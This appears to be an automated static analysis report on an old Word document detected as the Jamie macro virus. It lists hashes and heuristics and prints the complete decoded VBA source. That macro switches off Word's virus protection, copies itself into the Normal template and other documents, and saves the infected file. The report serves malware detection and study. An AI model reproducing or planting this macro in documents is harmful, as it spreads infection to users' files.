Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 23a57ec74da3d231…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 1999-05-21 20:59:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d381485eaad6f67db573f89992498f9c
SHA-1: 25ac6b603892a9e8a0e4714364345f5ca07378b9
SHA-256: 23a57ec74da3d231ddfdaf7cc26e23cf1c107e8b85edb7cc2f9c61af48756f06
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE document containing VBA macros, specifically a Document_Open macro. The macro attempts to export its code to 'Jamie.tmp', then import it into the Normal.dot template, and finally overwrite the current document's code. This behavior suggests an attempt to modify document templates or embed malicious code for persistence or propagation. The ClamAV detection 'Doc.Trojan.Jamie-1' and the macro's comments indicate it is a known piece of malware from 1999.

Heuristics (3)

  • ClamAV: Doc.Trojan.Jamie-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Jamie-1
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1557 bytes
SHA-256: 1c908a05a3a172a9465215de6f16861f073800f338809f5b5898622426ad0371

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If ActiveDocument.VBProject.Description <> "For Jamie..." Then GoTo ADI
If NormalTemplate.VBProject.Description <> "For Jamie..." Then GoTo NTI
End
ADI:
Set MTI = AD
Set MTC = NT
OPM = "Private Sub Document_Close()"
AII = AD.CodeModule.CountOfLines
ActiveDocument.VBProject.Description = "For Jamie..."
GoTo Install
NTI:
Set MTI = NT
Set MTC = AD
OPM = "Private Sub Document_Open()"
AII = NT.CodeModule.CountOfLines
NormalTemplate.VBProject.Description = "For Jamie..."
GoTo Install
Install:
If AII > 0 Then
 With MTI.CodeModule
  For x = x To AII
  .DeleteLines 1
  Next
 End With
End If
If AII >= 0 Then
 MTC.Export ("Jamie.tmp")
 MTI.CodeModule.AddFromFile ("Jamie.tmp")
  With MTI.CodeModule
   For x = x To 3
   .DeleteLines 1
   Next
   .ReplaceLine 1, OPM
  End With
 Kill ("Jamie.tmp")
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
',.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,
' Jamie(Type A - Strand A) By Lys KovicK
' Released: Friday, May 21, 1999, 15:40
'';';';';';';';';';';';';';';';';';';';';'